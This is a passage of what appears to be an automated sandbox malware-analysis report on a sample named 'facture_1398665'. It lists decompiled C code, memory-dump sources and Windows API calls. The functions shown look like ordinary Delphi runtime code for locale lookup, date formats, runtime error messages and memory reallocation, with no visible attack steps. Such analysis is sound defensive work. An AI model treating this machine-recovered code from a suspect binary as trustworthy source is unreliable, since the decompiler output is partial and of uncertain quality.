    • Associated: 00000002.00000001.12809054234.00412000.00000004.sdmp
    • Associated: 00000002.00000001.12809193738.00417000.00000004.sdmp
    • Associated: 00000002.00000001.12809202686.0041B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_1_400000_facture_1398665.jbxd
    C-Code - Quality: 56%
    			E0040BCB4(void* __ebx, void* __esi, void* __eflags) {
    				char _v8;
    				void* _v12;
    				char _v16;
    				char _v20;
    				intOrPtr* _t21;
    				intOrPtr* _t22;
    				intOrPtr _t61;
    				void* _t68;
    
    				_push(__ebx);
    				_v20 = 0;
    				_v8 = 0;
    				_push(_t68);
    				_push(0x40bdae);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t68 + 0xfffffff0;
    				_t21 = E00406728(__ebx, __esi, GetModuleHandleW(L"kernel32.dll"), L"GetUserDefaultUILanguage");
    				if(_t21 == 0) {
    					_t22 =  *0x412c7c; // 0x4127d8
    					if( *_t22 != 2) {
    						if(E0040BC8C(0, L"Control Panel\\Desktop\\ResourceLocale", 0x80000001,  &_v12, 1, 0) == 0) {
    							E0040BC80();
    							RegCloseKey(_v12);
    						}
    					} else {
    						if(E0040BC8C(0, L".DEFAULT\\Control Panel\\International", 0x80000003,  &_v12, 1, 0) == 0) {
    							E0040BC80();
    							RegCloseKey(_v12);
    						}
    					}
    					E00405058( &_v20, _v8, E0040BEC4);
    					E004032EC(_v20,  &_v16);
    					if(_v16 != 0) {
    					}
    				} else {
    					 *_t21();
    				}
    				_pop(_t61);
    				 *[fs:eax] = _t61;
    				_push(E0040BDB5);
    				L00404C88( &_v20);
    				return L00404C88( &_v8);
    			}











    0x0040bcba
    0x0040bcbd
    0x0040bcc0
    0x0040bcc5
    0x0040bcc6
    0x0040bccb
    0x0040bcce
    0x0040bce1
    0x0040bce8
    0x0040bcf3
    0x0040bcfb
    0x0040bd50
    0x0040bd5d
    0x0040bd66
    0x0040bd66
    0x0040bcfd
    0x0040bd18
    0x0040bd25
    0x0040bd2e
    0x0040bd2e
    0x0040bd18
    0x0040bd76
    0x0040bd81
    0x0040bd8c
    0x0040bd8c
    0x0040bcea
    0x0040bcea
    0x0040bcec
    0x0040bd92
    0x0040bd95
    0x0040bd98
    0x0040bda0
    0x0040bdad

    APIs
    • GetModuleHandleW.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,0040BDAE), ref: 0040BCDB
      • Part of subcall function 00406728: GetProcAddress.KERNEL32(?,0040BDAE,00000000,0040678B,?,00000000,?,00000000,?,0040BCE6,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,0040BDAE), ref: 0040674C
      • Part of subcall function 00406728: GetProcAddress.KERNEL32(?,00000000,00000000,0040678B,?,00000000,?,00000000,?,0040BCE6,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,0040BDAE), ref: 0040676E
    • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,0040BDAE), ref: 0040BD2E
      • Part of subcall function 0040BC8C: RegOpenKeyExW.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,0040BDAE,?,00000000,?,0040BD4E,?,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,0040BDAE), ref: 0040BCA8
    • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,0040BDAE), ref: 0040BD66
    Strings
    Memory Dump Source
    • Source File: 00000002.00000001.12808788925.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000001.12808757994.00400000.00000002.sdmp
    • Associated: 00000002.00000001.12809054234.00412000.00000004.sdmp
    • Associated: 00000002.00000001.12809193738.00417000.00000004.sdmp
    • Associated: 00000002.00000001.12809202686.0041B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_1_400000_facture_1398665.jbxd
    C-Code - Quality: 62%
    			E0040A5A8(void* __ebx, void* __edx, void* __edi, void* __esi) {
    				char _v8;
    				char _v12;
    				char _v16;
    				char _v20;
    				char _v24;
    				char _v28;
    				char _v32;
    				char _v36;
    				char _v40;
    				char _v44;
    				char _v48;
    				char _v52;
    				char _v56;
    				char _v60;
    				char _v64;
    				char _v68;
    				void* _t104;
    				void* _t111;
    				void* _t135;
    				intOrPtr _t187;
    				intOrPtr _t197;
    				intOrPtr _t198;
    
    				_t195 = __esi;
    				_t194 = __edi;
    				_t197 = _t198;
    				_t135 = 8;
    				do {
    					_push(0);
    					_push(0);
    					_t135 = _t135 - 1;
    				} while (_t135 != 0);
    				_push(__ebx);
    				_push(_t197);
    				_push(0x40a886);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t198;
    				E0040A4F0();
    				E00408F68(__ebx, __edi, __esi);
    				_t200 =  *0x415c3c;
    				if( *0x415c3c != 0) {
    					E00409140(__esi, _t200);
    				}
    				_t134 = GetThreadLocale();
    				E00408EB4(_t43, 0, 0x14,  &_v20);
    				E00404C98(0x415b6c, _v20);
    				E00408EB4(_t43, 0x40a8a0, 0x1b,  &_v24);
    				 *0x415b70 = E00407F10(0x40a8a0, 0, _t200);
    				E00408EB4(_t134, 0x40a8a0, 0x1c,  &_v28);
    				 *0x415b71 = E00407F10(0x40a8a0, 0, _t200);
    				 *0x415b72 = E00408F00(_t134, 0x2c, 0xf);
    				 *0x415b74 = E00408F00(_t134, 0x2e, 0xe);
    				E00408EB4(_t134, 0x40a8a0, 0x19,  &_v32);
    				 *0x415b76 = E00407F10(0x40a8a0, 0, _t200);
    				 *0x415b78 = E00408F00(_t134, 0x2f, 0x1d);
    				E00408EB4(_t134, L"m/d/yy", 0x1f,  &_v40);
    				E004091F4(_v40, _t134,  &_v36, _t194, _t195, _t200);
    				E00404C98(0x415b7c, _v36);
    				E00408EB4(_t134, L"mmmm d, yyyy", 0x20,  &_v48);
    				E004091F4(_v48, _t134,  &_v44, _t194, _t195, _t200);
    				E00404C98(0x415b80, _v44);
    				 *0x415b84 = E00408F00(_t134, 0x3a, 0x1e);
    				E00408EB4(_t134, 0x40a8f4, 0x28,  &_v52);
    				E00404C98(0x415b88, _v52);
    				E00408EB4(_t134, 0x40a908, 0x29,  &_v56);
    				E00404C98(0x415b8c, _v56);
    				E00404CEC( &_v12, 0);
    				E00404CEC( &_v16, 0);
    				E00408EB4(_t134, 0x40a8a0, 0x25,  &_v60);
    				_t104 = E00407F10(0x40a8a0, 0, _t200);
    				_t201 = _t104;
    				if(_t104 != 0) {
    					E00404CEC( &_v8, 0x40a92c);
    				} else {
    					E00404CEC( &_v8, 0x40a91c);
    				}
    				E00408EB4(_t134, 0x40a8a0, 0x23,  &_v64);
    				_t111 = E00407F10(0x40a8a0, 0, _t201);
    				_t202 = _t111;
    				if(_t111 == 0) {
    					E00408EB4(_t134, 0x40a8a0, 0x1005,  &_v68);
    					if(E00407F10(0x40a8a0, 0, _t202) != 0) {
    						E00404CEC( &_v12, L"AMPM ");
    					} else {
    						E00404CEC( &_v16, L" AMPM");
    					}
    				}
    				_push(_v12);
    				_push(_v8);
    				_push(":mm");
    				_push(_v16);
    				E0040513C(0x415b90, 4, _t194);
    				_push(_v12);
    				_push(_v8);
    				_push(L":mm:ss");
    				_push(_v16);
    				E0040513C(0x415b94, 4, _t194);
    				 *0x415c3e = E00408F00(_t134, 0x2c, 0xc);
    				_pop(_t187);
    				 *[fs:eax] = _t187;
    				_push(E0040A88D);
    				return L00404C90( &_v68, 0x10);
    			}

























    0x0040a5a8
    0x0040a5a8
    0x0040a5a9
    0x0040a5ab
    0x0040a5b0
    0x0040a5b0
    0x0040a5b2
    0x0040a5b4
    0x0040a5b4
    0x0040a5b7
    0x0040a5ba
    0x0040a5bb
    0x0040a5c0
    0x0040a5c3
    0x0040a5c6
    0x0040a5cb
    0x0040a5d0
    0x0040a5d7
    0x0040a5d9
    0x0040a5d9
    0x0040a5e3
    0x0040a5f2
    0x0040a5ff
    0x0040a614
    0x0040a623
    0x0040a638
    0x0040a647
    0x0040a65c
    0x0040a672
    0x0040a688
    0x0040a697
    0x0040a6ac
    0x0040a6c2
    0x0040a6cd
    0x0040a6da
    0x0040a6ef
    0x0040a6fa
    0x0040a707
    0x0040a71c
    0x0040a732
    0x0040a73f
    0x0040a754
    0x0040a761
    0x0040a76b
    0x0040a775
    0x0040a78a
    0x0040a794
    0x0040a799
    0x0040a79b
    0x0040a7b4
    0x0040a79d
    0x0040a7a5
    0x0040a7a5
    0x0040a7c9
    0x0040a7d3
    0x0040a7d8
    0x0040a7da
    0x0040a7ec
    0x0040a7fd
    0x0040a816
    0x0040a7ff
    0x0040a807
    0x0040a807
    0x0040a7fd
    0x0040a81b
    0x0040a81e
    0x0040a821
    0x0040a826
    0x0040a833
    0x0040a838
    0x0040a83b
    0x0040a83e
    0x0040a843
    0x0040a850
    0x0040a865
    0x0040a86d
    0x0040a870
    0x0040a873
    0x0040a885

    APIs
      • Part of subcall function 0040A4F0: GetThreadLocale.KERNEL32 ref: 0040A512
      • Part of subcall function 0040A4F0: GetSystemMetrics.USER32(0000004A), ref: 0040A563
      • Part of subcall function 00408F68: GetThreadLocale.KERNEL32(00000000,0040907B,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00408F84
    • GetThreadLocale.KERNEL32(00000000,0040A886,?,?,00000000,00000000), ref: 0040A5DE
      • Part of subcall function 00408EB4: GetLocaleInfoW.KERNEL32(?,?,?,00000100), ref: 00408ED2
      • Part of subcall function 00408F00: GetLocaleInfoW.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040A65C,00000000,0040A886,?,?,00000000,00000000), ref: 00408F13
      • Part of subcall function 004091F4: GetThreadLocale.KERNEL32(?,00000000,00409427,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040922F
      • Part of subcall function 00409140: GetThreadLocale.KERNEL32(?,00000000,004091D7,?,?,00000000), ref: 00409158
      • Part of subcall function 00409140: GetThreadLocale.KERNEL32(00000000,00000004,00000000,004091D7,?,?,00000000), ref: 00409188
      • Part of subcall function 00409140: EnumCalendarInfoW.KERNEL32(Function_0000908C,00000000,00000000,00000004,00000000,004091D7,?,?,00000000), ref: 00409193
      • Part of subcall function 00409140: GetThreadLocale.KERNEL32(00000000,00000003,Function_0000908C,00000000,00000000,00000004,00000000,004091D7,?,?,00000000), ref: 004091B1
      • Part of subcall function 00409140: EnumCalendarInfoW.KERNEL32(Function_000090C8,00000000,00000000,00000003,Function_0000908C,00000000,00000000,00000004,00000000,004091D7,?,?,00000000), ref: 004091BC
    Strings
    Memory Dump Source
    • Source File: 00000002.00000001.12808788925.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000001.12808757994.00400000.00000002.sdmp
    • Associated: 00000002.00000001.12809054234.00412000.00000004.sdmp
    • Associated: 00000002.00000001.12809193738.00417000.00000004.sdmp
    • Associated: 00000002.00000001.12809202686.0041B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_1_400000_facture_1398665.jbxd
    C-Code - Quality: 79%
    			E004044F0(void* __ecx) {
    				long _v4;
    				int _t3;
    
    				if( *0x41304c == 0) {
    					if( *0x412028 == 0) {
    						_t3 = MessageBoxA(0, "Runtime error     at 00000000", "Error", 0);
    					}
    					return _t3;
    				} else {
    					if( *0x413328 == 0xd7b2 &&  *0x413330 > 0) {
    						 *0x413340();
    					}
    					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1d,  &_v4, 0);
    					return WriteFile(GetStdHandle(0xfffffff5), E0040457C, 2,  &_v4, 0);
    				}
    			}





    0x004044f8
    0x00404558
    0x00404568
    0x00404568
    0x0040456e
    0x004044fa
    0x00404503
    0x00404513
    0x00404513
    0x0040452f
    0x00404550
    0x00404550

    APIs
    • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,004045A1,?,?,?,00000001,004046B6,00402F13,00402F5A,00000000,?), ref: 00404529
    • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?), ref: 0040452F
    • GetStdHandle.KERNEL32(000000F5,0040457C,00000002,?,00000000,00000000,?,004045A1,?,?,?,00000001,004046B6,00402F13,00402F5A,00000000), ref: 00404544
    • WriteFile.KERNEL32(00000000,000000F5,0040457C,00000002,?), ref: 0040454A
    • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00404568
    Strings
    Memory Dump Source
    • Source File: 00000002.00000001.12808788925.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000001.12808757994.00400000.00000002.sdmp
    • Associated: 00000002.00000001.12809054234.00412000.00000004.sdmp
    • Associated: 00000002.00000001.12809193738.00417000.00000004.sdmp
    • Associated: 00000002.00000001.12809202686.0041B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_1_400000_facture_1398665.jbxd
    C-Code - Quality: 88%
    			E00401E74(signed int __eax, intOrPtr __edx, void* __edi) {
    				signed int __ebx;
    				void* __esi;
    				signed int _t69;
    				signed int _t78;
    				signed int _t93;
    				long _t94;
    				void* _t100;
    				signed int _t102;
    				signed int _t109;
    				signed int _t115;
    				signed int _t123;
    				signed int _t129;
    				void* _t131;
    				signed int _t140;
    				unsigned int _t148;
    				signed int _t150;
    				long _t152;
    				signed int _t156;
    				intOrPtr _t161;
    				signed int _t166;
    				signed int _t170;
    				unsigned int _t171;
    				intOrPtr _t174;
    				intOrPtr _t180;
    				intOrPtr _t193;
    				signed int _t196;
    				signed int _t197;
    				signed int _t198;
    				void* _t206;
    				unsigned int _t208;
    				intOrPtr _t214;
    				void* _t226;
    				intOrPtr _t228;
    				void* _t229;
    				signed int _t231;
    				void* _t233;
    				signed int _t234;
    				signed int _t235;
    				signed int _t239;
    				signed int _t242;
    				void* _t244;
    				intOrPtr* _t245;
    
    				_t176 = __edx;
    				_t66 = __eax;
    				_t166 =  *(__eax - 4);
    				_t218 = __eax;
    				if((_t166 & 0x00000007) != 0) {
    					__eflags = _t166 & 0x00000005;
    					if((_t166 & 0x00000005) != 0) {
    						_pop(_t218);
    						_pop(_t145);
    						__eflags = _t166 & 0x00000003;
    						if((_t166 & 0x00000003) == 0) {
    							_push(_t145);
    							_push(__eax);
    							_push(__edi);
    							_push(_t226);
    							_t245 = _t244 + 0xffffffe0;
    							_t219 = __edx;
    							_t203 = __eax;
    							_t69 =  *(__eax - 4);
    							_t148 = (_t69 & 0xfffffff0) - 0x14;
    							if(_t148 >= __edx) {
    								__eflags = __edx - _t148 >> 1;
    								if(__edx < _t148 >> 1) {
    									_t150 = E004018F8(__edx);
    									__eflags = _t150;
    									if(_t150 != 0) {
    										__eflags = _t219 - 0x40a2c;
    										if(_t219 > 0x40a2c) {
    											_t78 = _t203 - 0x10;
    											__eflags = _t78;
    											 *((intOrPtr*)(_t78 + 8)) = _t219;
    										}
    										E004014BC(_t203, _t219, _t150);
    										E00401C7C(_t203, _t203, _t226);
    									}
    								} else {
    									_t150 = __eax;
    									 *((intOrPtr*)(__eax - 0x10 + 8)) = __edx;
    								}
    							} else {
    								_t180 = (_t148 >> 2) + _t148;
    								if(_t180 <= __edx) {
    									_t228 = __edx;
    								} else {
    									_t228 = _t180;
    								}
    								 *_t245 = _t203 - 0x10 + (_t69 & 0xfffffff0);
    								VirtualQuery( *(_t245 + 8), _t245 + 8, 0x1c);
    								if( *((intOrPtr*)(_t245 + 0x14)) != 0x10000) {
    									L12:
    									_t150 = E004018F8(_t228);
    									__eflags = _t150;
    									if(_t150 != 0) {
    										__eflags = _t228 - 0x40a2c;
    										if(_t228 > 0x40a2c) {
    											_t93 = _t150 - 0x10;
    											__eflags = _t93;
    											 *((intOrPtr*)(_t93 + 8)) = _t219;
    										}
    										E0040148C(_t203,  *((intOrPtr*)(_t203 - 0x10 + 8)), _t150);
    										E00401C7C(_t203, _t203, _t228);
    									}
    								} else {
    									 *(_t245 + 0x10) =  *(_t245 + 0x10) & 0xffff0000;
    									_t94 =  *(_t245 + 0x10);
    									if(_t219 - _t148 >= _t94) {
    										goto L12;
    									} else {
    										_t152 = _t228 - _t148 + 0x00010000 - 0x00000001 & 0xffff0000;
    										if(_t94 < _t152) {
    											_t152 = _t94;
    										}
    										if(VirtualAlloc( *(_t245 + 0xc), _t152, 0x2000, 4) == 0 || VirtualAlloc( *(_t245 + 0xc), _t152, 0x1000, 4) == 0) {
    											goto L12;
    										} else {
    											_t100 = _t203 - 0x10;
    											 *((intOrPtr*)(_t100 + 8)) = _t219;
    											 *(_t100 + 0xc) = _t152 +  *(_t100 + 0xc) | 0x00000008;
    											_t150 = _t203;
    										}
    									}
    								}
    							}
    							return _t150;
    						} else {
    							__eflags = 0;
    							return 0;
    						}
    					} else {
    						_t170 = _t166 & 0xfffffff0;
    						_push(__edi);
    						_t206 = _t170 + __eax;
    						_t171 = _t170 - 4;
    						_t156 = _t166 & 0x0000000f;
    						__eflags = __edx - _t171;
    						_push(_t226);
    						if(__edx > _t171) {
    							_t102 =  *(_t206 - 4);
    							__eflags = _t102 & 0x00000001;
    							if((_t102 & 0x00000001) == 0) {
    								L75:
    								asm("adc edi, 0xffffffff");
    								_t229 = ((_t171 >> 0x00000002) + _t171 - _t176 & 0) + _t176;
    								_t208 = _t171;
    								_t109 = E004018F8(((_t171 >> 0x00000002) + _t171 - _t176 & 0) + _t176);
    								_t193 = _t176;
    								__eflags = _t109;
    								if(_t109 == 0) {
    									goto L73;
    								} else {
    									__eflags = _t229 - 0x40a2c;
    									if(_t229 > 0x40a2c) {
    										 *((intOrPtr*)(_t109 - 8)) = _t193;
    									}
    									_t231 = _t109;
    									E0040148C(_t218, _t208, _t109);
    									E00401C7C(_t218, _t208, _t231);
    									return _t231;
    								}
    							} else {
    								_t115 = _t102 & 0xfffffff0;
    								_t233 = _t171 + _t115;
    								__eflags = __edx - _t233;
    								if(__edx > _t233) {
    									goto L75;
    								} else {
    									__eflags =  *0x41304d;
    									if(__eflags == 0) {
    										L66:
    										__eflags = _t115 - 0xb30;
    										if(_t115 >= 0xb30) {
    											E004014D8(_t206);
    											_t176 = _t176;
    											_t171 = _t171;
    										}
    										asm("adc edi, 0xffffffff");
    										_t123 = (_t176 + ((_t171 >> 0x00000002) + _t171 - _t176 & 0) + 0x000000d3 & 0xffffff00) + 0x30;
    										_t196 = _t233 + 4 - _t123;
    										__eflags = _t196;
    										if(_t196 > 0) {
    											 *(_t218 + _t233 - 4) = _t196;
    											 *((intOrPtr*)(_t218 - 4 + _t123)) = _t196 + 3;
    											_t234 = _t123;
    											__eflags = _t196 - 0xb30;
    											if(_t196 >= 0xb30) {
    												__eflags = _t123 + _t218;
    												E00401518(_t123 + _t218, _t171, _t196);
    											}
    										} else {
    											 *(_t218 + _t233) =  *(_t218 + _t233) & 0xfffffff7;
    											_t234 = _t233 + 4;
    										}
    										_t235 = _t234 | _t156;
    										__eflags = _t235;
    										 *(_t218 - 4) = _t235;
    										 *0x413a34 = 0;
    										_t109 = _t218;
    										L73:
    										return _t109;
    									} else {
    										while(1) {
    											asm("lock cmpxchg [0x413a34], ah");
    											if(__eflags == 0) {
    												break;
    											}
    											asm("pause");
    											__eflags =  *0x4138d5;
    											if(__eflags != 0) {
    												continue;
    											} else {
    												Sleep(0);
    												_t176 = _t176;
    												_t171 = _t171;
    												asm("lock cmpxchg [0x413a34], ah");
    												if(__eflags != 0) {
    													Sleep(0xa);
    													_t176 = _t176;
    													_t171 = _t171;
    													continue;
    												}
    											}
    											break;
    										}
    										_t156 = 0x0000000f &  *(_t218 - 4);
    										_t129 =  *(_t206 - 4);
    										__eflags = _t129 & 0x00000001;
    										if((_t129 & 0x00000001) == 0) {
    											L74:
    											 *0x413a34 = 0;
    											goto L75;
    										} else {
    											_t115 = _t129 & 0xfffffff0;
    											_t233 = _t171 + _t115;
    											__eflags = _t176 - _t233;
    											if(_t176 > _t233) {
    												goto L74;
    											} else {
    												goto L66;
    											}
    										}
    									}
    								}
    							}
    						} else {
    							__eflags = __edx + __edx - _t171;
    							if(__edx + __edx < _t171) {
    								__eflags = __edx - 0xb2c;
    								if(__edx >= 0xb2c) {
    									L41:
    									_t32 = _t176 + 0xd3; // 0xbff
    									_t239 = (_t32 & 0xffffff00) + 0x30;
    									_t174 = _t171 + 4 - _t239;
    									__eflags =  *0x41304d;
    									if(__eflags != 0) {
    										while(1) {
    											asm("lock cmpxchg [0x413a34], ah");
    											if(__eflags == 0) {
    												break;
    											}
    											asm("pause");
    											__eflags =  *0x4138d5;
    											if(__eflags != 0) {
    												continue;
    											} else {
    												Sleep(0);
    												_t174 = _t174;
    												asm("lock cmpxchg [0x413a34], ah");
    												if(__eflags != 0) {
    													Sleep(0xa);
    													_t174 = _t174;
    													continue;
    												}
    											}
    											break;
    										}
    										_t156 = 0x0000000f &  *(_t218 - 4);
    										__eflags = 0xf;
    									}
    									 *(_t218 - 4) = _t156 | _t239;
    									_t161 = _t174;
    									_t197 =  *(_t206 - 4);
    									__eflags = _t197 & 0x00000001;
    									if((_t197 & 0x00000001) != 0) {
    										_t131 = _t206;
    										_t198 = _t197 & 0xfffffff0;
    										_t161 = _t161 + _t198;
    										_t206 = _t206 + _t198;
    										__eflags = _t198 - 0xb30;
    										if(_t198 >= 0xb30) {
    											E004014D8(_t131);
    										}
    									} else {
    										 *(_t206 - 4) = _t197 | 0x00000008;
    									}
    									 *((intOrPtr*)(_t206 - 8)) = _t161;
    									 *((intOrPtr*)(_t218 + _t239 - 4)) = _t161 + 3;
    									__eflags = _t161 - 0xb30;
    									if(_t161 >= 0xb30) {
    										E00401518(_t218 + _t239, _t174, _t161);
    									}
    									 *0x413a34 = 0;
    									return _t218;
    								} else {
    									__eflags = __edx - 0x2cc;
    									if(__edx < 0x2cc) {
    										_t214 = __edx;
    										_t140 = E004018F8(__edx);
    										__eflags = _t140;
    										if(_t140 != 0) {
    											_t242 = _t140;
    											E004014BC(_t218, _t214, _t140);
    											E00401C7C(_t218, _t214, _t242);
    											_t140 = _t242;
    										}
    										return _t140;
    									} else {
    										_t176 = 0xb2c;
    										__eflags = _t171 - 0xb2c;
    										if(_t171 <= 0xb2c) {
    											goto L37;
    										} else {
    											goto L41;
    										}
    									}
    								}
    							} else {
    								L37:
    								return _t66;
    							}
    						}
    					}
    				} else {
    					__ebx =  *__ecx;
    					__ecx =  *(__ebx + 2) & 0x0000ffff;
    					__ecx = ( *(__ebx + 2) & 0x0000ffff) - 4;
    					__eflags = __ecx - __edx;
    					if(__ecx < __edx) {
    						__ecx = __ecx + __ecx + 0x20;
    						_push(__edi);
    						__edi = __edx;
    						__eax = 0;
    						__ecx = __ecx - __edx;
    						asm("adc eax, 0xffffffff");
    						__eax = 0 & __ecx;
    						__eax = (0 & __ecx) + __edx;
    						__eax = E004018F8((0 & __ecx) + __edx);
    						__eflags = __eax;
    						if(__eax != 0) {
    							__eflags = __edi - 0x40a2c;
    							if(__edi > 0x40a2c) {
    								 *(__eax - 8) = __edi;
    							}
    							 *(__ebx + 2) & 0x0000ffff = ( *(__ebx + 2) & 0x0000ffff) - 4;
    							__eflags = ( *(__ebx + 2) & 0x0000ffff) - 4;
    							__edx = __eax;
    							__edi = __eax;
    							 *((intOrPtr*)(__ebx + 0x1c))() = E00401C7C(__esi, __edi, __ebp);
    							__eax = __edi;
    						}
    						_pop(__edi);
    						_pop(__esi);
    						_pop(__ebx);
    						return __eax;
    					} else {
    						__ebx = 0x40 + __edx * 4;
    						__eflags = 0x40 + __edx * 4 - __ecx;
    						if(0x40 + __edx * 4 < __ecx) {
    							__ebx = __edx;
    							__eax = __edx;
    							__eax = E004018F8(__edx);
    							__eflags = __eax;
    							if(__eax != 0) {
    								__ecx = __ebx;
    								__edx = __eax;
    								__ebx = __eax;
    								__esi = E00401C7C(__esi, __edi, __ebp);
    								__eax = __ebx;
    							}
    							_pop(__esi);
    							_pop(__ebx);
    							return __eax;
    						} else {
    							_pop(__esi);
    							_pop(__ebx);
    							return __eax;
    						}
    					}
    				}
    			}













































    0x00401e74
    0x00401e74
    0x00401e74
    0x00401e7c
    0x00401e7e
    0x00401f0c
    0x00401f0f
    0x0040217c
    0x0040217d
    0x0040217e
    0x00402181
    0x004017ac
    0x004017ad
    0x004017ae
    0x004017af
    0x004017b0
    0x004017b3
    0x004017b5
    0x004017bc
    0x004017c3
    0x004017c8
    0x004018b1
    0x004018b3
    0x004018c6
    0x004018c8
    0x004018ca
    0x004018cc
    0x004018d2
    0x004018d6
    0x004018d6
    0x004018d9
    0x004018d9
    0x004018e2
    0x004018e9
    0x004018e9
    0x004018b5
    0x004018b5
    0x004018ba
    0x004018ba
    0x004017ce
    0x004017d3
    0x004017d7
    0x004017dd
    0x004017d9
    0x004017d9
    0x004017d9
    0x004017e9
    0x004017f8
    0x00401805
    0x00401877
    0x0040187e
    0x00401880
    0x00401882
    0x00401884
    0x0040188a
    0x0040188e
    0x0040188e
    0x00401891
    0x00401891
    0x004018a1
    0x004018a8
    0x004018a8
    0x00401807
    0x00401807
    0x00401813
    0x00401819
    0x00000000
    0x0040181b
    0x0040182c
    0x00401830
    0x00401832
    0x00401832
    0x00401848
    0x00000000
    0x00401860
    0x00401862
    0x00401865
    0x00401870
    0x00401873
    0x00401873
    0x00401848
    0x00401819
    0x00401805
    0x004018f7
    0x00402187
    0x00402187
    0x00402189
    0x00402189
    0x00401f15
    0x00401f17
    0x00401f1a
    0x00401f1b
    0x00401f1e
    0x00401f21
    0x00401f24
    0x00401f26
    0x00401f27
    0x0040203c
    0x0040203f
    0x00402041
    0x00402134
    0x0040213f
    0x00402146
    0x00402148
    0x0040214b
    0x00402150
    0x00402151
    0x00402153
    0x00000000
    0x00402155
    0x00402155
    0x0040215b
    0x0040215d
    0x0040215d
    0x00402160
    0x00402168
    0x0040216f
    0x0040217a
    0x0040217a
    0x00402047
    0x00402047
    0x0040204a
    0x0040204d
    0x0040204f
    0x00000000
    0x00402055
    0x00402055
    0x0040205c
    0x004020b9
    0x004020b9
    0x004020be
    0x004020c4
    0x004020c9
    0x004020ca
    0x004020ca
    0x004020d6
    0x004020e7
    0x004020ed
    0x004020ed
    0x004020ef
    0x004020fc
    0x00402103
    0x00402107
    0x00402109
    0x0040210f
    0x00402111
    0x00402113
    0x00402113
    0x004020f1
    0x004020f1
    0x004020f5
    0x004020f5
    0x00402118
    0x00402118
    0x0040211a
    0x0040211d
    0x00402124
    0x00402126
    0x0040212a
    0x0040205e
    0x0040205e
    0x00402063
    0x0040206b
    0x00000000
    0x00000000
    0x0040206d
    0x0040206f
    0x00402076
    0x00000000
    0x00402078
    0x0040207c
    0x00402081
    0x00402082
    0x00402088
    0x00402090
    0x00402096
    0x0040209b
    0x0040209c
    0x00000000
    0x0040209c
    0x00402090
    0x00000000
    0x00402076
    0x004020a5
    0x004020a8
    0x004020ab
    0x004020ad
    0x0040212d
    0x0040212d
    0x00000000
    0x004020af
    0x004020af
    0x004020b2
    0x004020b5
    0x004020b7
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x004020b7
    0x004020ad
    0x0040205c
    0x0040204f
    0x00401f2d
    0x00401f30
    0x00401f32
    0x00401f3c
    0x00401f42
    0x00401f59
    0x00401f59
    0x00401f65
    0x00401f6b
    0x00401f6d
    0x00401f74
    0x00401f76
    0x00401f7b
    0x00401f83
    0x00000000
    0x00000000
    0x00401f85
    0x00401f87
    0x00401f8e
    0x00000000
    0x00401f90
    0x00401f93
    0x00401f98
    0x00401f9e
    0x00401fa6
    0x00401fab
    0x00401fb0
    0x00000000
    0x00401fb0
    0x00401fa6
    0x00000000
    0x00401f8e
    0x00401fb9
    0x00401fb9
    0x00401fb9
    0x00401fbe
    0x00401fc1
    0x00401fc3
    0x00401fc6
    0x00401fc9
    0x00401fd4
    0x00401fd6
    0x00401fd9
    0x00401fdb
    0x00401fdd
    0x00401fe3
    0x00401fe5
    0x00401fe5
    0x00401fcb
    0x00401fce
    0x00401fce
    0x00401fea
    0x00401ff0
    0x00401ff4
    0x00401ffa
    0x00402001
    0x00402001
    0x00402006
    0x00402013
    0x00401f44
    0x00401f44
    0x00401f4a
    0x00402014
    0x00402018
    0x0040201d
    0x0040201f
    0x00402021
    0x00402029
    0x00402030
    0x00402035
    0x00402035
    0x0040203b
    0x00401f50
    0x00401f50
    0x00401f55
    0x00401f57
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00401f57
    0x00401f4a
    0x00401f34
    0x00401f34
    0x00401f38
    0x00401f38
    0x00401f32
    0x00401f27
    0x00401e84
    0x00401e84
    0x00401e86
    0x00401e8a
    0x00401e8d
    0x00401e8f
    0x00401ec8
    0x00401ecc
    0x00401ecd
    0x00401ecf
    0x00401ed1
    0x00401ed3
    0x00401ed6
    0x00401ed8
    0x00401eda
    0x00401edf
    0x00401ee1
    0x00401ee3
    0x00401ee9
    0x00401eeb
    0x00401eeb
    0x00401ef2
    0x00401ef2
    0x00401ef5
    0x00401ef7
    0x00401f00
    0x00401f05
    0x00401f05
    0x00401f07
    0x00401f08
    0x00401f09
    0x00401f0a
    0x00401e91
    0x00401e91
    0x00401e98
    0x00401e9a
    0x00401ea0
    0x00401ea2
    0x00401ea4
    0x00401ea9
    0x00401eab
    0x00401ead
    0x00401eaf
    0x00401eb1
    0x00401ebc
    0x00401ec1
    0x00401ec1
    0x00401ec3
    0x00401ec4
    0x00401ec5
    0x00401e9c
    0x00401e9c
    0x00401e9d
    0x00401e9e
    0x00401e9e
    0x00401e9a
    0x00401e8f

    APIs
    • VirtualQuery.KERNEL32(?,?,0000001C), ref: 004017F8
